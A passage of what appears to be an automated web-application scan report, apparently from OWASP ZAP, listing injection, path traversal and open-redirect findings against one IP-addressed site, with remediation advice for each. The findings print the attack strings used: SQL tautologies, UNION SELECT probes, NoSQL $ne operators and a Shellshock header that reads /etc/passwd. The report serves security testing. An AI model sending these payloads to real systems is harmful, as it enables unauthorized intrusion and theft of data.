URL redirectors represent common functionality employed by web sites to forward an incoming request to an alternate resource. This can be done for a variety of reasons and is often done to allow resources to be moved within the directory structure and to avoid breaking functionality for users that request the resource at its previous location. URL redirectors may also be used to implement load balancing, leveraging abbreviated URLs or recording outgoing links. It is this last implementation which is often used in phishing attacks as described in the example below. URL redirectors do not necessarily represent a direct security vulnerability but can be abused by attackers trying to social engineer victims into believing that they are navigating to a site other than the true destination.
|
| URL | http://142.202.242.172/xampp |
| Method | GET |
| Parameter | host |
| Attack | 7548671629728595560.owasp.org |
| Evidence | 7548671629728595560.owasp.org |
| Request Header - size: 254 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 248 bytes. | |
| Response Body - size: 370 bytes. | |
| Instances | 1 |
| Solution |
Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use an allow list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a deny list). However, deny lists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."
Use an allow list of approved URLs or domains to be used for redirection.
Use an intermediate disclaimer page that provides the user with a clear warning that they are leaving your site. Implement a long timeout before the redirect occurs, or force the user to click on the link. Be careful to avoid XSS problems when generating the disclaimer page.
When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.
For example, ID 1 could map to "/login.asp" and ID 2 could map to "https://www.example.com/". Features such as the ESAPI AccessReferenceMap provide this capability.
Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls.
Many open redirect problems occur because the programmer assumed that certain inputs could not be modified, such as cookies and hidden form fields.
|
| Reference |
https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html
https://cwe.mitre.org/data/definitions/601.html |
| Tags |
OWASP_2021_A03
WSTG-v42-CLNT-04 OWASP_2017_A01 |
| CWE Id | 601 |
| WASC Id | 38 |
| Plugin Id | 20019 |
| High | LDAP Injection |
|---|---|
| Description |
LDAP Injection may be possible. It may be possible for an attacker to bypass authentication controls, and to view and modify arbitrary data in the LDAP directory.
|
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | POST |
| Parameter | password |
| Attack | Equivalent LDAP expression: [\' UNION SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),\'a\') -- -)(objectClass=*]. Random parameter: [p1znp6wofqs4vmgkdzob037dwmdnpaovyv3zcpy7o9xf829jwq90wooa3789bdsugi4tptljm7y2pfxq34kv4exmqusopkl92uwo6]. |
| Evidence | |
| Request Header - size: 1,061 bytes. | |
| Request Body - size: 208 bytes. | |
| Response Header - size: 252 bytes. | |
| Response Body - size: 0 bytes. | |
| Instances | 1 |
| Solution |
Validate and/or escape all user input before using it to create an LDAP query. In particular, the following characters (or combinations) should be deny listed:
&
|
!
<
>
=
~=
>=
<=
*
(
)
,
+
-
"
'
;
\
/
NUL character
|
| Reference |
http://www.testingsecurity.com/how-to-test/injection-vulnerabilities/LDAP-Injection
https://owasp.org/www-community/attacks/LDAP_Injection |
| Tags |
OWASP_2021_A03
WSTG-v42-INPV-06 OWASP_2017_A01 |
| CWE Id | 90 |
| WASC Id | 29 |
| Plugin Id | 40015 |
| High | NoSQL Injection - MongoDB |
|---|---|
| Description |
MongoDB query injection may be possible.
|
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | |
| Evidence | |
| Request Header - size: 221 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 314 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | POST |
| Parameter | Content-Type |
| Attack | |
| Evidence | |
| Request Header - size: 1,061 bytes. | |
| Request Body - size: 208 bytes. | |
| Response Header - size: 252 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172//dashboard.php?id=54 |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | TQUIA729JAULAMJS[$ne] |
| Evidence | |
| Request Header - size: 791 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 240 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172//login.php |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | TQUIA729JAULAMJS[$ne] |
| Evidence | |
| Request Header - size: 205 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172//login.php/327qi |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | TQUIA729JAULAMJS[$ne] |
| Evidence | |
| Request Header - size: 211 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172//login.php/327qi/Capture.PNG |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | TQUIA729JAULAMJS[$ne] |
| Evidence | |
| Request Header - size: 409 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172//login.php/327qi/Sound%20Effects |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | TQUIA729JAULAMJS[$ne] |
| Evidence | |
| Request Header - size: 227 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172//login.php/327qi/Sound%20Effects/error.wav |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | TQUIA729JAULAMJS[$ne] |
| Evidence | |
| Request Header - size: 423 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172//tasks_page.php |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | TQUIA729JAULAMJS[$ne] |
| Evidence | |
| Request Header - size: 443 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 240 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | POST |
| Parameter | Content-Type |
| Attack | Content-Type[$ne] |
| Evidence | |
| Request Header - size: 1,028 bytes. | |
| Request Body - size: 208 bytes. | |
| Response Header - size: 255 bytes. | |
| Response Body - size: 3,435 bytes. | |
| Instances | 10 |
| Solution |
Do not trust client side input and escape all data on the server side.
Avoid using the query input directly in the where and group clauses, and upgrade all drivers to the latest available version.
|
| Reference |
https://arxiv.org/pdf/1506.04082.pdf
https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection.html |
| Tags |
OWASP_2021_A03
WSTG-v42-INPV-05 OWASP_2017_A01 |
| CWE Id | 943 |
| WASC Id | 19 |
| Plugin Id | 40033 |
| High | Path Traversal |
|---|---|
| Description |
The Path Traversal attack technique allows an attacker access to files, directories, and commands that potentially reside outside the web document root directory. An attacker may manipulate a URL in such a way that the web site will execute or reveal the contents of arbitrary files anywhere on the web server. Any device that exposes an HTTP-based interface is potentially vulnerable to Path Traversal.
Most web sites restrict user access to a specific portion of the file-system, typically called the "web document root" or "CGI root" directory. These directories contain the files intended for user access and the executables necessary to drive web application functionality. To access files or execute commands anywhere on the file-system, Path Traversal attacks make use of special-character sequences.
The most basic Path Traversal attack uses the "../" special-character sequence to alter the resource location requested in the URL. Although most popular web servers will prevent this technique from escaping the web document root, alternate encodings of the "../" sequence may help bypass the security filters. These method variations include valid and invalid Unicode-encoding ("..%u2216" or "..%c0%af") of the forward slash character, backslash characters ("..\") on Windows-based servers, URL-encoded characters ("%2e%2e%2f"), and double URL encoding ("..%255c") of the backslash character.
Even if the web server properly restricts Path Traversal attempts in the URL path, a web application itself may still be vulnerable due to improper handling of user-supplied input. This is a common problem of web applications that use template mechanisms or load static text from files. In variations of the attack, the original URL parameter value is substituted with the file name of one of the web application's dynamic scripts. Consequently, the results can reveal source code because the file is interpreted as text instead of an executable script. These techniques often employ additional special characters such as the dot (".") to reveal the listing of the current working directory, or "%00" NULL characters in order to bypass rudimentary file extension checks.
|
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | host |
| Attack | /login.php |
| Evidence | |
| Request Header - size: 744 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 206 bytes. | |
| Response Body - size: 325 bytes. | |
| Instances | 1 |
| Solution |
Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use an allow list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a deny list). However, deny lists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."
For filenames, use stringent allow lists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses, and exclude directory separators such as "/". Use an allow list of allowable file extensions.
Warning: if you attempt to cleanse your data, then do so such that the end result is not in a form that can be dangerous. A sanitizing mechanism can remove characters such as '.' and ';' which may be required for some exploits. An attacker can try to fool the sanitizing mechanism into "cleaning" data into a dangerous form. Suppose the attacker injects a '.' inside a filename (e.g. "sensi.tiveFile") and the sanitizing mechanism removes the character, resulting in the valid filename "sensitiveFile". If the input data are now assumed to be safe, then the file may be compromised.
Inputs should be decoded and canonicalized to the application's current internal representation before being validated. Make sure that your application does not decode the same input twice. Such errors could be used to bypass allow list schemes by introducing dangerous inputs after they have been checked.
Use a built-in path canonicalization function (such as realpath() in C) that produces the canonical version of the pathname, which effectively removes ".." sequences and symbolic links.
Run your code using the lowest privileges that are required to accomplish the necessary tasks. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.
When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.
Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by your software.
OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows you to specify restrictions on file operations.
This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise.
|
| Reference |
https://owasp.org/www-community/attacks/Path_Traversal
https://cwe.mitre.org/data/definitions/22.html |
| Tags |
OWASP_2021_A01
WSTG-v42-ATHZ-01 OWASP_2017_A05 |
| CWE Id | 22 |
| WASC Id | 33 |
| Plugin Id | 6 |
| High | SQL Injection |
|---|---|
| Description |
SQL injection may be possible.
|
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54 |
| Method | GET |
| Parameter | sec-ch-ua |
| Attack | "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"" AND "1"="1" -- |
| Evidence | |
| Request Header - size: 714 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54 |
| Method | GET |
| Parameter | Sec-Fetch-Site |
| Attack | same-origin% |
| Evidence | |
| Request Header - size: 699 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54 |
| Method | GET |
| Parameter | User-Agent |
| Attack | () {:;}; /bin/cat /etc/passwd%' -- |
| Evidence | |
| Request Header - size: 698 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54%22+AND+%221%22%3D%221 |
| Method | GET |
| Parameter | id |
| Attack | 54" OR "1"="1 |
| Evidence | |
| Request Header - size: 720 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54 |
| Method | GET |
| Parameter | sec-ch-ua |
| Attack | "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"" AND "1"="1 |
| Evidence | |
| Request Header - size: 819 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 370 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54 |
| Method | GET |
| Parameter | sec-ch-ua-mobile |
| Attack | ?0' AND '1'='1' -- |
| Evidence | |
| Request Header - size: 823 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54 |
| Method | GET |
| Parameter | Sec-Fetch-Dest |
| Attack | document OR 1=1 -- |
| Evidence | |
| Request Header - size: 818 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54 |
| Method | GET |
| Parameter | Sec-Fetch-Mode |
| Attack | navigate AND 1=1 |
| Evidence | |
| Request Header - size: 815 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=56-2 |
| Method | GET |
| Parameter | id |
| Attack | 56-2 |
| Evidence | |
| Request Header - size: 809 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php |
| Method | GET |
| Parameter | sec-ch-ua-platform |
| Attack | "Windows" OR 1=1 -- |
| Evidence | |
| Request Header - size: 646 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 370 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi%20OR%201=1%20AND%201=1 |
| Method | GET |
| Parameter | 327qi OR 1=1 |
| Attack | 327qi OR 1=1 OR 1=1 |
| Evidence | |
| Request Header - size: 250 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 314 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi%20OR%201=1/Sound%20Effects |
| Method | GET |
| Parameter | 327qi |
| Attack | 327qi OR 1=1 |
| Evidence | |
| Request Header - size: 254 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 206 bytes. | |
| Response Body - size: 542 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi%25'%20%20--%20/Sound%20Effects/error.wav |
| Method | GET |
| Parameter | 327qi |
| Attack | 327qi%' -- |
| Evidence | |
| Request Header - size: 454 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 314 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi%25'%20%20--%20/Sound%20Effects/error.wav |
| Method | GET |
| Parameter | 327qi |
| Attack | 327qi%' -- |
| Evidence | |
| Request Header - size: 454 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 206 bytes. | |
| Response Body - size: 542 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects%20ASC%20%20--%20/error.wav |
| Method | GET |
| Parameter | Sound Effects |
| Attack | Sound Effects ASC -- |
| Evidence | |
| Request Header - size: 456 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 314 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects%25 |
| Method | GET |
| Parameter | Sound Effects |
| Attack | Sound Effects% |
| Evidence | |
| Request Header - size: 246 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 314 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav?query=query%22+OR+%221%22%3D%221%22+--+ |
| Method | GET |
| Parameter | query |
| Attack | query" OR "1"="1" -- |
| Evidence | |
| Request Header - size: 479 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 206 bytes. | |
| Response Body - size: 542 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects?query=query%25%27++--+ |
| Method | GET |
| Parameter | query |
| Attack | query%' -- |
| Evidence | |
| Request Header - size: 266 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 314 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV%25%27++--+&value=%271%27%3D1%27&id=54 |
| Method | GET |
| Parameter | bot |
| Attack | DESKTOP-95IQEEV%' -- |
| Evidence | |
| Request Header - size: 781 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54 |
| Method | GET |
| Parameter | Accept |
| Attack | text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" AND "1"="1" -- |
| Evidence | |
| Request Header - size: 737 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54 |
| Method | GET |
| Parameter | sec-ch-ua |
| Attack | "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"% |
| Evidence | |
| Request Header - size: 722 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54 |
| Method | GET |
| Parameter | sec-ch-ua-platform |
| Attack | "Windows"" OR "1"="1" -- |
| Evidence | |
| Request Header - size: 736 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 261 bytes. | |
| Response Body - size: 560 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54 |
| Method | GET |
| Parameter | Sec-Fetch-Site |
| Attack | same-origin%" -- |
| Evidence | |
| Request Header - size: 727 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54 |
| Method | GET |
| Parameter | Upgrade-Insecure-Requests |
| Attack | 1" OR "1"="1" -- |
| Evidence | |
| Request Header - size: 736 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 261 bytes. | |
| Response Body - size: 560 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54+AND+1%3D1+--+ |
| Method | GET |
| Parameter | id |
| Attack | 54 AND 1=1 -- |
| Evidence | |
| Request Header - size: 735 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54 |
| Method | GET |
| Parameter | Accept-Language |
| Attack | en-US,en;q=0.9 OR 1=1 -- |
| Evidence | |
| Request Header - size: 781 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54 |
| Method | GET |
| Parameter | Referer |
| Attack | https://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54' OR '1'='1 |
| Evidence | |
| Request Header - size: 782 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 370 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54 |
| Method | GET |
| Parameter | sec-ch-ua-mobile |
| Attack | ?0%' -- |
| Evidence | |
| Request Header - size: 776 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54 |
| Method | GET |
| Parameter | sec-ch-ua-platform |
| Attack | "Windows"%" -- |
| Evidence | |
| Request Header - size: 776 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54 |
| Method | GET |
| Parameter | User-Agent |
| Attack | () {:;}; /bin/cat /etc/passwd' AND '1'='1' -- |
| Evidence | |
| Request Header - size: 770 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54%25%27++--+ |
| Method | GET |
| Parameter | id |
| Attack | 54%' -- |
| Evidence | |
| Request Header - size: 781 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 261 bytes. | |
| Response Body - size: 560 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27+AND+1%3D1+--+&id=54 |
| Method | GET |
| Parameter | value |
| Attack | '1'=1' AND 1=1 -- |
| Evidence | |
| Request Header - size: 784 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27%25%27++--+&bot=DESKTOP-95IQEEV&id=54 |
| Method | GET |
| Parameter | command |
| Attack | '1'=1'%' -- |
| Evidence | |
| Request Header - size: 803 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV%22+AND+%221%22%3D%221%22+--+&id=54 |
| Method | GET |
| Parameter | bot |
| Attack | DESKTOP-95IQEEV" AND "1"="1" -- |
| Evidence | |
| Request Header - size: 821 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV&id=54 |
| Method | GET |
| Parameter | sec-ch-ua-platform |
| Attack | "Windows"%' -- |
| Evidence | |
| Request Header - size: 798 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 261 bytes. | |
| Response Body - size: 560 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV&id=54 |
| Method | GET |
| Parameter | Upgrade-Insecure-Requests |
| Attack | 1' AND '1'='1 |
| Evidence | |
| Request Header - size: 804 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV&id=54%27+AND+%271%27%3D%271%27+--+ |
| Method | GET |
| Parameter | id |
| Attack | 54' OR '1'='1' -- |
| Evidence | |
| Request Header - size: 821 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 333 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php |
| Method | GET |
| Parameter | Accept |
| Attack | text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8%' -- |
| Evidence | |
| Request Header - size: 465 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php |
| Method | GET |
| Parameter | Accept-Language |
| Attack | en-US,en;q=0.5' OR '1'='1' -- |
| Evidence | |
| Request Header - size: 475 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php |
| Method | GET |
| Parameter | Sec-Fetch-Dest |
| Attack | document% |
| Evidence | |
| Request Header - size: 460 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php |
| Method | GET |
| Parameter | Sec-Fetch-Mode |
| Attack | navigate' OR '1'='1' -- |
| Evidence | |
| Request Header - size: 475 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php |
| Method | GET |
| Parameter | Sec-Fetch-Site |
| Attack | none%" -- |
| Evidence | |
| Request Header - size: 465 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54 |
| Method | GET |
| Parameter | Accept |
| Attack | text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' OR '1'='1 |
| Evidence | |
| Request Header - size: 715 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 260 bytes. | |
| Response Body - size: 560 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54 |
| Method | GET |
| Parameter | sec-ch-ua |
| Attack | "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"%" -- |
| Evidence | |
| Request Header - size: 710 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54 |
| Method | GET |
| Parameter | Upgrade-Insecure-Requests |
| Attack | 1 ASC -- |
| Evidence | |
| Request Header - size: 712 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%22+AND+%221%22%3D%221%22+--+ |
| Method | GET |
| Parameter | id |
| Attack | 54" AND "1"="1" -- |
| Evidence | |
| Request Header - size: 733 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54&task_select=1¶ms=%27+UNION+SELECT+%40%40version+--+-&unit_EXEC=18.9&limit=%27+UNION+SELECT+%40%40version+--+-&dllFunction=%22+OR+%221%22%3D%221&customArgs= |
| Method | GET |
| Parameter | dllFunction |
